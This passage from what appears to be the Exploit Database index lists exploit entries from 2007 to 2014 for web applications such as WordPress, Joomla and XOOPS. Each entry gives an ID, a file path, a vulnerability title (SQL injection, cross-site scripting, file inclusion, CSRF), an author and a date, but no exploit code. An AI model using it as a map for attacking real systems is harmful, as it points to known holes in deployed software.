'download.php' Local File Inclusion",2007-10-22,hack2prison,webapps,php, +30703,exploits/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",webapps,php, +30704,exploits/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - 'download.jsp?name' Arbitrary File Access",2007-10-23,Xcross87,webapps,jsp, +30705,exploits/jsp/webapps/30705.txt,"Korean GHBoard - 'Component/upload.jsp' Arbitrary File Upload",2007-10-23,Xcross87,webapps,jsp, +30706,exploits/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - 'index.asp' SQL Injection",2007-10-24,"Aria-Security Team",webapps,asp, +30707,exploits/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,webapps,php, +30708,exploits/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - 'Page.asp' SQL Injection",2007-10-25,joseph.giron13,webapps,asp, +30712,exploits/php/webapps/30712.txt,"Multi-Forums - 'Directory.php' Multiple SQL Injections",2007-10-25,KiNgOfThEwOrLd,webapps,php, +30715,exploits/php/webapps/30715.txt,"WordPress 2.3 - 'Edit-Post-Rows.php' Cross-Site Scripting",2007-10-29,waraxe,webapps,php, +30716,exploits/php/webapps/30716.txt,"Smart-Shop - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,Doz,webapps,php, +30717,exploits/php/webapps/30717.txt,"Omnistar Live - 'KB.php' Cross-Site Scripting",2007-10-29,Doz,webapps,php, +30718,exploits/php/webapps/30718.txt,"Saxon 5.4 - 'Menu.php' Cross-Site Scripting",2007-10-29,netVigilance,webapps,php, +30719,exploits/php/webapps/30719.txt,"Saxon 5.4 - 'Example.php' SQL Injection",2007-10-29,netVigilance,webapps,php, +30806,exploits/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - 'Directory' Cross-Site Scripting",2007-11-26,"Jose Luis Gongora Fernandez",webapps,php, +30807,exploits/asp/webapps/30807.txt,"GOUAE DWD Realty - 'Password' SQL Injection",2007-11-26,"Aria-Security Team",webapps,asp, +30808,exploits/cgi/webapps/30808.txt,"GWExtranet 3.0 - 'Scp.dll' Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,webapps,cgi, +30723,exploits/hardware/webapps/30723.php,"Seagate BlackArmor NAS - Privilege Escalation",2014-01-06,"Jeroen - IT Nerdbox",webapps,hardware, +30725,exploits/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",webapps,hardware, +30726,exploits/hardware/webapps/30726.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",webapps,hardware, +30727,exploits/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",webapps,hardware, +30731,exploits/php/webapps/30731.txt,"Synergiser 1.2 - 'index.php' Local File Inclusion",2007-11-01,KiNgOfThEwOrLd,webapps,php, +30732,exploits/php/webapps/30732.txt,"CONTENTCustomizer 3.1 - 'Dialog.php' Information Disclosure",2007-11-01,d3hydr8,webapps,php, +30733,exploits/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - 'Server_Status.php' Cross-Site Scripting",2007-10-17,"Omer Singer",webapps,php, +30734,exploits/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - 'admin/index.php' Cross-Site Scripting",2007-11-02,"Ivan Sanchez",webapps,php, +30735,exploits/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 - 'index.php' Local File Inclusion",2007-11-03,joseph.giron13,webapps,php, +30737,exploits/php/webapps/30737.txt,"Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion",2007-11-05,"arfis project",webapps,php, +30738,exploits/php/webapps/30738.txt,"E-Vendejo 0.2 - 'Articles.php' SQL Injection",2007-11-05,r00t,webapps,php, +30739,exploits/php/webapps/30739.txt,"JLMForo System - 'Buscado.php' Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",webapps,php, +30741,exploits/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",2007-11-05,"BorN To K!LL",webapps,php, +30743,exploits/asp/webapps/30743.txt,"i-Gallery 3.4 - 'igallery.asp' Remote Information Disclosure",2007-11-05,hackerbinhphuoc,webapps,asp, +30745,exploits/php/webapps/30745.html,"Weblord.it MS-TopSites - Unauthorized Access / HTML Injection",2007-11-06,0x90,webapps,php, +30746,exploits/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",webapps,php, +30747,exploits/asp/webapps/30747.txt,"Rapid Classified - 'AgencyCatResult.asp' SQL Injection",2007-11-08,The-0utl4w,webapps,asp, +30748,exploits/php/webapps/30748.txt,"XOOPS 2.0.17.1 Mylinks Module - 'Brokenlink.php' SQL Injection",2007-11-09,root@hanicker.it,webapps,php, +30750,exploits/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - 'modules.php' SQL Injection",2007-11-12,0x90,webapps,php, +30751,exploits/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",webapps,php, +30754,exploits/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - 'PHP_SELF index.php' Cross-Site Scripting",2007-08-27,L4teral,webapps,php, +30757,exploits/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,webapps,php, +30758,exploits/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,webapps,php, +30759,exploits/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - 'Searchtype' Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",webapps,cgi, +30762,exploits/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",webapps,php, +30764,exploits/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - 'Dialog.php' Unauthorized Access",2007-11-14,d3hydr8,webapps,php, +30770,exploits/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",webapps,cgi, +30774,exploits/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",webapps,php, +30775,exploits/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injections",2007-11-17,"Aria-Security Team",webapps,asp, +30777,exploits/cgi/webapps/30777.txt,"Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,webapps,cgi, +30778,exploits/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",webapps,asp, +30975,exploits/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,webapps,cgi, +30976,exploits/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple SQL Injections",2008-01-03,The:Paradox,webapps,php, +30977,exploits/php/webapps/30977.txt,"WordPress 2.2.3 - '/wp-admin/post.php?popuptitle' Cross-Site Scripting",2008-01-03,3APA3A,webapps,php, +30786,exploits/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php,80 +30790,exploits/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",webapps,php,80 +30811,exploits/php/webapps/30811.txt,"SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,webapps,php, +30813,exploits/php/webapps/30813.txt,"FMDeluxe 2.1 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,webapps,php, +30815,exploits/php/webapps/30815.txt,"Tilde 4.0 - 'Aarstal' Cross-Site Scripting",2007-11-26,KiNgOfThEwOrLd,webapps,php, +30817,exploits/php/webapps/30817.html,"Liferay Portal 4.3.1 - Forgot-Password Cross-Site Scripting",2007-11-27,"Joshua Morin",webapps,php, +30818,exploits/cgi/webapps/30818.txt,"ht://Dig 3.2 - Htsearch Cross-Site Scripting",2007-11-27,"Michael Skibbe",webapps,cgi, +30820,exploits/php/webapps/30820.txt,"p.mapper 3.2 beta3 - '/incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,webapps,php, +30821,exploits/php/webapps/30821.txt,"p.mapper 3.2 beta3 - '/plugins/export/mc_table.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,webapps,php, +30822,exploits/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",webapps,php, +30823,exploits/php/webapps/30823.txt,"bcoos 1.0.10 - 'ratephoto.php' SQL Injection",2007-11-28,Lostmon,webapps,php, +30824,exploits/php/webapps/30824.txt,"bcoos 1.0.10 - 'ratelink.php' SQL Injection",2007-11-28,Lostmon,webapps,php, +30826,exploits/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/admin/modules/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,webapps,php, +30827,exploits/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/admin/modules/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,webapps,php, +30828,exploits/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/admin/patch/index.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,webapps,php, +30829,exploits/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/ossigeno/admin/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,webapps,php, +30830,exploits/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/ossigeno/admin/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,webapps,php, +30831,exploits/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - '/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno' Remote File Inclusion",2007-11-30,ShAy6oOoN,webapps,php, +30836,exploits/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,webapps,php, +30841,exploits/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - '/pages/default.aspx?template' Remote File Access",2007-12-04,"Adrian Pastor",webapps,asp, +30842,exploits/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple SQL Injections",2007-12-04,"Adrian Pastor",webapps,asp, +30843,exploits/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx?rmore' Cross-Site Scripting",2007-12-04,"Adrian Pastor",webapps,asp, +30844,exploits/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 - '/pages/default.aspx?template' Cross-Site Scripting",2007-12-04,"Adrian Pastor",webapps,asp, +30845,exploits/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - 'getpath.aspx' Direct Request Error Message Information",2007-12-04,"Adrian Pastor",webapps,asp, +30846,exploits/php/webapps/30846.txt,"phpMyChat 0.14.5 - 'chat/deluser.php3?LIMIT' Cross-Site Scripting",2007-12-04,beenudel1986,webapps,php, +30847,exploits/php/webapps/30847.txt,"phpMyChat 0.14.5 - '/chat/users_popupL.php3' Multiple Cross-Site Scripting Vulnerabilities",2007-12-04,beenudel1986,webapps,php, +30848,exploits/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' SQL Injection",2007-12-05,beenudel1986,webapps,php, +30849,exploits/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple SQL Injections",2007-12-05,beenudel1986,webapps,php, +30851,exploits/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,webapps,php, +30852,exploits/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,webapps,php, +30853,exploits/php/webapps/30853.txt,"OpenNewsletter 2.5 - 'Compose.php' Cross-Site Scripting",2007-12-06,Manu,webapps,php, +30854,exploits/php/webapps/30854.sh,"wwwstats 3.21 - 'Clickstats.php' Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",webapps,php, +30855,exploits/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,webapps,asp, +30857,exploits/php/webapps/30857.txt,"webSPELL 4.1.2 - 'usergallery.php?galleryID' Cross-Site Scripting",2007-12-10,Brainhead,webapps,php, +30858,exploits/php/webapps/30858.txt,"webSPELL 4.1.2 - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-10,Brainhead,webapps,php, +30859,exploits/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation",2007-12-10,"Tomas Kuliavas",webapps,php, +30860,exploits/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,webapps,asp, +30861,exploits/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - '/mylinks/ratelink.php?lid' SQL Injection",2007-12-10,Lostmon,webapps,php, +30862,exploits/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - '/adresses/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,webapps,php, +30863,exploits/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 - '/mydownloads/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,webapps,php, +30864,exploits/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 - '/mysections/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,webapps,php, +30884,exploits/php/webapps/30884.txt,"XOOPS 2.2.5 - 'register.php' Cross-Site Scripting",2007-11-12,"Omer Singer",webapps,php, +30886,exploits/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module - SQL Injection",2007-12-13,"Sw33t h4cK3r",webapps,php, +30887,exploits/php/webapps/30887.txt,"phPay 2.2.1 - Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",webapps,php, +30888,exploits/php/webapps/30888.txt,"phpRPG 0.8 - '/tmp' Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",webapps,php, +30889,exploits/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",webapps,php, +30890,exploits/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusions",2007-12-14,RoMaNcYxHaCkEr,webapps,php, +30891,exploits/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",webapps,php, +30892,exploits/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",webapps,php, +30893,exploits/php/webapps/30893.txt,"PHP Security Framework - Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,webapps,php, +30899,exploits/php/webapps/30899.txt,"Mambo 4.6.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",webapps,php, +30909,exploits/php/webapps/30909.html,"Auto Classifieds Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-14,HackXBack,webapps,php,80 +30910,exploits/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80 +30911,exploits/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80 +30912,exploits/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80 +30913,exploits/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80 +30914,exploits/hardware/webapps/30914.txt,"Conceptronic Wireless Pan & Tilt Network Camera - Cross-Site Request Forgery",2014-01-14,"Felipe Molina",webapps,hardware,80 +30916,exploits/php/webapps/30916.txt,"Burden 1.8 - Authentication Bypass",2014-01-14,"High-Tech Bridge SA",webapps,php,80 +30917,exploits/php/webapps/30917.txt,"Horizon QCMS 4.0 - Multiple Vulnerabilities",2014-01-14,"High-Tech Bridge SA",webapps,php,80 +30918,exploits/php/webapps/30918.txt,"iDevSpot iSupport 1.8 - 'index.php' Local File Inclusion",2007-12-20,JuMp-Er,webapps,php, +30919,exploits/cgi/webapps/30919.txt,"SiteScape Forum - 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,webapps,cgi, +30921,exploits/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,webapps,php, +30923,exploits/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php?ID' Remote File Inclusion",2007-12-22,"Beenu Arora",webapps,php, +30924,exploits/php/webapps/30924.txt,"Dokeos 1.x - '/forum/viewthread.php?forum' Cross-Site Scripting",2007-12-22,Doz,webapps,php, +30925,exploits/php/webapps/30925.txt,"Dokeos 1.x - '/forum/viewforum.php?forum' Cross-Site Scripting",2007-12-22,Doz,webapps,php, +30926,exploits/php/webapps/30926.txt,"Dokeos 1.x - '/work/work.php?display_upload_form Action origin' Cross-Site Scripting",2007-12-22,Doz,webapps,php, +30927,exploits/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion",2007-12-24,Koller,webapps,php, +30929,exploits/php/webapps/30929.txt,"Logaholic - 'update.php?page' SQL Injection",2007-12-24,malibu.r,webapps,php, +30930,exploits/php/webapps/30930.txt,"Logaholic - 'index.php' SQL Injection",2007-12-24,malibu.r,webapps,php, +30931,exploits/php/webapps/30931.txt,"Logaholic - 'index.php?conf' Cross-Site Scripting",2007-12-24,malibu.r,webapps,php, +30932,exploits/php/webapps/30932.txt,"Logaholic - 'profiles.php?newconfname' Cross-Site Scripting",2007-12-24,malibu.r,webapps,php, +30937,exploits/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Cross-Site Scripting",2007-12-25,"Omer Singer",webapps,php, +30938,exploits/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injections",2007-12-24,bypass,webapps,asp, +30940,exploits/asp/webapps/30940.txt,"IPortalX - '/forum/login_user.asp' Multiple Cross-Site Scripting Vulnerabilities",2007-12-27,Doz,webapps,asp, +30941,exploits/asp/webapps/30941.txt,"IPortalX - 'blogs.asp?Date' Cross-Site Scripting",2007-12-27,Doz,webapps,asp, +30945,exploits/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",webapps,php, +30946,exploits/php/webapps/30946.txt,"Collabtive 1.1 - 'managetimetracker.php' SQL Injection",2014-01-15,"Yogesh Phadtare",webapps,php,80 +30947,exploits/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' SQL Injection",2007-12-28,"Juan Galiana Lara",webapps,php, +30948,exploits/php/webapps/30948.txt,"OpenBiblio 0.x - 'staff_del_confirm.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-28,"Juan Galiana Lara",webapps,php, +30949,exploits/php/webapps/30949.txt,"OpenBiblio 0.x - 'theme_del_confirm.php?name' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",webapps,php, +30950,exploits/php/webapps/30950.html,"PHPJabbers Pet Listing Script 1.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80 +30951,exploits/php/webapps/30951.html,"OpenBiblio 0.x - 'theme_preview.php?themeName' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",webapps,php, +30952,exploits/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-15,HackXBack,webapps,php,80 +30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80 +30954,exploits/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80 +30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80 +30957,exploits/php/webapps/30957.txt,"PHCDownload 1.1 - 'search.php?string' SQL Injection",2007-12-29,Lostmon,webapps,php, +30958,exploits/php/webapps/30958.txt,"PHCDownload 1.1 - 'search.php?string' Cross-Site Scripting",2007-12-29,Lostmon,webapps,php, +30959,exploits/php/webapps/30959.txt,"Makale Scripti - Cross-Site Scripting",2007-12-29,GeFORC3,webapps,php, +30960,exploits/php/webapps/30960.pl,"CustomCMS 3.1 - 'vars.php' SQL Injection",2007-12-29,Pr0metheuS,webapps,php, +30961,exploits/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 - 'function.php' Remote File Inclusion",2007-12-30,bd0rk,webapps,php, +30962,exploits/php/webapps/30962.txt,"MilliScripts - 'dir.php' Cross-Site Scripting",2007-12-31,"Jose Luis Gangora Fernandez",webapps,php, +30963,exploits/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",webapps,asp, +30964,exploits/php/webapps/30964.txt,"LiveCart 1.0.1 - 'return' Cross-Site Scripting (1)",2007-12-31,Doz,webapps,php, +30965,exploits/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Cross-Site Scripting",2007-12-31,Doz,webapps,php, +30966,exploits/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Cross-Site Scripting (2)",2007-12-31,Doz,webapps,php, +30967,exploits/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Cross-Site Scripting",2007-12-31,Doz,webapps,php, +30979,exploits/php/webapps/30979.txt,"WordPress 2.2.3 - '/wp-admin/edit.php?backup' Cross-Site Scripting",2008-01-03,3APA3A,webapps,php, +30980,exploits/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,webapps,php, +30981,exploits/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,webapps,php, +30982,exploits/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' SQL Injection",2008-01-03,MustLive,webapps,php, +30983,exploits/php/webapps/30983.txt,"ExpressionEngine 1.2.1 - HTTP Response Splitting / Cross-Site Scripting",2008-01-03,MustLive,webapps,php, +30984,exploits/php/webapps/30984.txt,"eTicket 1.5.5 - 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-03,"Omer Singer",webapps,php, +31083,exploits/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Inclusion",2008-01-31,muuratsalo,webapps,php, +30987,exploits/php/webapps/30987.txt,"NetRisk 1.9.7 - 'index.php' Remote File Inclusion",2008-01-04,S.W.A.T.,webapps,php, +30988,exploits/php/webapps/30988.txt,"Rotabanner Local 2/3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,webapps,php, +30992,exploits/php/webapps/30992.txt,"Strawberry 1.1.1 - 'html.php' Remote Code Execution",2008-01-07,"Eugene Minaev",webapps,php, +30993,exploits/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,webapps,asp, +30994,exploits/php/webapps/30994.html,"eTicket 1.5.5.2 - 'admin.php' Cross-Site Request Forgery",2008-01-07,L4teral,webapps,php, +30995,exploits/php/webapps/30995.txt,"eTicket 1.5.5.2 - 'view.php?s' Cross-Site Scripting",2008-01-07,L4teral,webapps,php, +30996,exploits/php/webapps/30996.txt,"eTicket 1.5.5.2 - 'search.php' Multiple SQL Injections",2008-01-07,L4teral,webapps,php, +30997,exploits/php/webapps/30997.txt,"eTicket 1.5.5.2 - 'admin.php' Multiple SQL Injections",2008-01-07,L4teral,webapps,php, +31000,exploits/php/webapps/31000.txt,"SysHotel On Line System - 'index.php' Local File Inclusion",2008-01-08,p4imi0,webapps,php, +31001,exploits/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - '/admin/index.html' Cross-Site Scripting",2008-01-08,Ekin0x,webapps,php, +31003,exploits/php/webapps/31003.txt,"Omegasoft Insel 7 - Authentication Bypass / User Enumeration",2008-01-09,MC.Iglo,webapps,php, +31004,exploits/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,"Jan Fry & Adrian Pastor",webapps,jsp, +31005,exploits/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp?resultsForm' Cross-Site Scripting",2008-01-09,"Jan Fry & Adrian Pastor",webapps,jsp, +31006,exploits/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp?helpUrl' Remote Frame Injection",2008-01-09,"Jan Fry & Adrian Pastor",webapps,jsp, +31007,exploits/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp?activeControl' Cross-Site Scripting",2008-01-09,"Jan Fry & Adrian Pastor",webapps,jsp, +31008,exploits/php/webapps/31008.txt,"Joomla! Component SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,webapps,php, +31009,exploits/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection",2008-01-10,consultant.securite,webapps,php, +31011,exploits/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,webapps,php, +31082,exploits/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 - User-Agent HTTP Header Cross-Site Scripting",2008-01-31,"Tomasz Kuczynski",webapps,php, +31015,exploits/php/webapps/31015.txt,"BloofoxCMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,80 +31017,exploits/asp/webapps/31017.php,"SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting",2014-01-17,"Saeed reza Zamanian",webapps,asp,80 +31020,exploits/php/webapps/31020.txt,"Moodle 1.8.3 - 'install.php' Cross-Site Scripting",2008-01-12,"Hanno Bock",webapps,php, +31022,exploits/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",webapps,php, +31034,exploits/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injections",2008-01-16,waraxe,webapps,php, +31035,exploits/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,webapps,php, +31037,exploits/php/webapps/31037.txt,"phpAutoVideo 2.21 - 'sidebar.php?loadpage' Remote File Inclusion",2008-01-18,"H-T Team",webapps,php, +31038,exploits/php/webapps/31038.txt,"phpAutoVideo 2.21 - 'index.php?cat' Cross-Site Scripting",2008-01-18,"H-T Team",webapps,php, +31041,exploits/php/webapps/31041.txt,"BloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,AmnPardaz,webapps,php, +31042,exploits/asp/webapps/31042.txt,"MegaBBS 1.5.14b - 'upload.asp' Cross-Site Scripting",2008-01-21,Doz,webapps,asp, +31043,exploits/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router - Cross-Site Request Forgery",2008-01-21,WarGame,webapps,cgi, +31044,exploits/php/webapps/31044.txt,"Singapore 0.10.1 Modern Template - 'gallery' Cross-Site Scripting",2008-01-21,trew,webapps,php, +31045,exploits/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Remote File Inclusion",2008-01-21,anonymous,webapps,php, +31048,exploits/php/webapps/31048.txt,"PacerCMS 0.6 - 'id' Multiple SQL Injections",2008-01-22,RawSecurity.org,webapps,php, +31049,exploits/php/webapps/31049.txt,"DeluxeBB 1.1 - 'attachments_header.php' Cross-Site Scripting",2008-01-22,NBBN,webapps,php, +31055,exploits/asp/webapps/31055.txt,"Web Wiz (Multiple Products) - Remote Information Disclosure",2008-01-23,AmnPardaz,webapps,asp, +31058,exploits/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,webapps,asp, +31059,exploits/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,webapps,asp, +31061,exploits/php/webapps/31061.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting (1)",2008-01-25,"Omer Singer",webapps,php, +31062,exploits/php/webapps/31062.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting 